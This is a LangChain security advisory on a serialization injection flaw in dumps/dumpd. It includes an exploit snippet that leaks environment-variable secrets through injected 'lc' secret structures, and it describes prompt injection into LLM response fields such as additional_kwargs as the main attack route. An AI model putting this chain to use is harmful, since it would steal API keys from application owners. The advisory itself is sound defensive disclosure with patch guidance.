Headline
GHSA-c67j-w6g6-q2cm: LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs
Summary
A serialization injection vulnerability exists in LangChain’s dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.
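For context, LangChain marks serialized objects with an `lc` envelope. A minimal sketch of the two shapes involved (field values are illustrative, not exhaustive):

```python
# Shape produced by dumpd()/dumps() for a genuine LangChain object
# (illustrative; real manifests may carry additional fields):
langchain_manifest = {
    "lc": 1,                      # serialization format version marker
    "type": "constructor",        # rebuild the object via its constructor
    "id": ["langchain_core", "messages", "HumanMessage"],  # import path
    "kwargs": {"content": "hi"},  # constructor arguments
}

# A free-form user dictionary that merely mimics that shape. Before the fix,
# dumps()/dumpd() did not escape it, so load()/loads() interpreted it as a
# real LangChain object instead of plain user data.
user_dict = {"user_data": {"lc": 1, "type": "secret", "id": ["SOME_ENV_VAR"]}}
```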
Attack surface
The core vulnerability was in dumps() and dumpd(): these functions failed to escape user-controlled dictionaries containing 'lc' keys. When this unescaped data was later deserialized via load() or loads(), the injected structures were treated as legitimate LangChain objects rather than plain user data.
This escaping bug enabled several attack vectors:
- Injection via user data: Malicious LangChain object structures could be injected through user-controlled fields like `metadata`, `additional_kwargs`, or `response_metadata`.
- Class instantiation within trusted namespaces: Injected manifests could instantiate any `Serializable` subclass, but only within the pre-approved trusted namespaces (`langchain_core`, `langchain`, `langchain_community`). This includes classes with side effects in `__init__` (network calls, file operations, etc.), as sketched below. Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.
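A hedged sketch of the second vector; the class path and keyword arguments below are placeholders, not a known-exploitable gadget:

```python
# Hypothetical injected manifest hidden inside user-controlled data.
# On affected versions, load()/loads() treats a dict shaped like this as a
# constructor manifest and instantiates the referenced class with the given
# kwargs, as long as the class lives in a trusted namespace.
injected = {
    "lc": 1,
    "type": "constructor",
    # Placeholder import path; any Serializable subclass under langchain_core,
    # langchain, or langchain_community could be targeted.
    "id": ["langchain_community", "some_module", "SomeSerializableClass"],
    "kwargs": {"url": "https://attacker.example"},  # attacker-chosen arguments
}
```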
Security hardening
This patch fixes the escaping bug in dumps() and dumpd() and introduces new restrictive defaults in load() and loads(): allowlist enforcement via allowed_objects="core" (restricted to serialization mappings), secrets_from_env changed from True to False, and default Jinja2 template blocking via init_validator. These are breaking changes for some use cases.
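Written out explicitly, a post-patch call looks roughly like the following (parameter names are taken from this advisory; exact signatures may vary between releases):

```python
from langchain_core.load import dumps, loads
from langchain_core.messages import HumanMessage

serialized_json = dumps(HumanMessage(content="hello"))

# The new defaults, spelled out for illustration:
obj = loads(
    serialized_json,
    allowed_objects="core",   # allowlist limited to langchain_core mappings
    secrets_from_env=False,   # no automatic secret loading from env vars
)
# init_validator defaults to default_init_validator, which blocks Jinja2
# templates; pass init_validator=None only for data you fully trust.
```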
Who is affected?
Applications are vulnerable if they:
- Use `astream_events(version="v1")` — The v1 implementation internally uses vulnerable serialization. Note: `astream_events(version="v2")` is not vulnerable.
- Use `Runnable.astream_log()` — This method internally uses vulnerable serialization for streaming outputs.
- Call `dumps()` or `dumpd()` on untrusted data, then deserialize with `load()` or `loads()` — Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains `'lc'` key structures.
- Deserialize untrusted data with `load()` or `loads()` — Directly deserializing untrusted data that may contain injected `'lc'` structures.
- Use `RunnableWithMessageHistory` — Internal serialization in message history handling.
- Use `InMemoryVectorStore.load()` to deserialize untrusted documents.
- Load untrusted generations from cache using `langchain-community` caches.
- Load untrusted manifests from the LangChain Hub via `hub.pull`.
- Use `StringRunEvaluatorChain` on untrusted runs.
- Use `create_lc_store` or `create_kv_docstore` with untrusted documents.
- Use `MultiVectorRetriever` with byte stores containing untrusted documents.
- Use `LangSmithRunChatLoader` with runs containing untrusted messages.
The most common attack vector is through LLM response fields like additional_kwargs or response_metadata, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.
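For example, a prompt-injected model response could carry the structure in its `additional_kwargs` and round-trip like this on affected versions (a minimal sketch; streaming code paths such as `astream_events(version="v1")` perform the equivalent serialization internally):

```python
import os

from langchain_core.load import dumps, load
from langchain_core.messages import AIMessage

os.environ.setdefault("OPENAI_API_KEY", "sk-example-not-a-real-key")

# A model response whose additional_kwargs were shaped by prompt injection
msg = AIMessage(
    content="Sure, here is your answer.",
    additional_kwargs={
        "payload": {"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}
    },
)

serialized = dumps(msg)  # affected versions do not escape the nested 'lc' dict
restored = load(serialized, secrets_from_env=True)
# On affected versions, restored.additional_kwargs["payload"] comes back as the
# resolved environment-variable value instead of the original dictionary.
```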
Impact
Attackers who control serialized data can extract environment variable secrets by injecting {"lc": 1, "type": "secret", "id": ["ENV_VAR"]} to load environment variables during deserialization (when secrets_from_env=True, which was the old default). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within trusted namespaces with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.
Key severity factors:
- Affects the serialization path: applications trusting their own serialization output are vulnerable
- Enables secret extraction when combined with `secrets_from_env=True` (the old default)
- LLM responses in `additional_kwargs` can be controlled via prompt injection
Exploit example
```python
import os

from langchain_core.load import dumps, load

# Attacker injects secret structure into user-controlled data
attacker_dict = {
    "user_data": {
        "lc": 1,
        "type": "secret",
        "id": ["OPENAI_API_KEY"]
    }
}

serialized = dumps(attacker_dict)  # Bug: does NOT escape the 'lc' key

os.environ["OPENAI_API_KEY"] = "sk-secret-key-12345"
deserialized = load(serialized, secrets_from_env=True)

print(deserialized["user_data"])  # "sk-secret-key-12345" - SECRET LEAKED!
```
Security hardening changes (breaking changes)
This patch introduces three breaking changes to load() and loads():
- New `allowed_objects` parameter (defaults to `'core'`): Enforces an allowlist of classes that can be deserialized. The `'all'` option corresponds to the list of objects specified in `mappings.py`, while the `'core'` option limits deserialization to objects within `langchain_core`. We recommend that users explicitly specify which objects they want to allow for serialization/deserialization.
- `secrets_from_env` default changed from `True` to `False`: Disables automatic secret loading from the environment.
- New `init_validator` parameter (defaults to `default_init_validator`): Blocks Jinja2 templates by default.
Migration guide
No changes needed for most users
If you’re deserializing standard LangChain types (messages, documents, prompts, trusted partner integrations like ChatOpenAI, ChatAnthropic, etc.), your code will work without changes:
```python
from langchain_core.load import load

# Uses default allowlist from serialization mappings
obj = load(serialized_data)
```
For custom classes
If you’re deserializing custom classes not in the serialization mappings, add them to the allowlist:
```python
from langchain_core.load import load
from my_package import MyCustomClass

# Specify the classes you need
obj = load(serialized_data, allowed_objects=[MyCustomClass])
```
For Jinja2 templates
Jinja2 templates are now blocked by default because they can execute arbitrary code. If you need Jinja2 templates, pass init_validator=None:
```python
from langchain_core.load import load
from langchain_core.prompts import PromptTemplate

obj = load(
    serialized_data,
    allowed_objects=[PromptTemplate],
    init_validator=None,
)
```
> [!WARNING]
> Only disable `init_validator` if you trust the serialized data. Jinja2 templates can execute arbitrary Python code.
For secrets from environment
`secrets_from_env` now defaults to `False`. If you need to load secrets from environment variables:

```python
from langchain_core.load import load

obj = load(serialized_data, secrets_from_env=True)
```
Credits
- The `dumps()` escaping bug was reported by @yardenporat
- Security hardening changes stem from findings by @0xn3va and @VladimirEliTokarev
References
- GHSA-c67j-w6g6-q2cm
- langchain-ai/langchain#34455
- langchain-ai/langchain#34458
- langchain-ai/langchain@5ec0fa6
- langchain-ai/langchain@d9ec4c5
- https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.81
- https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.5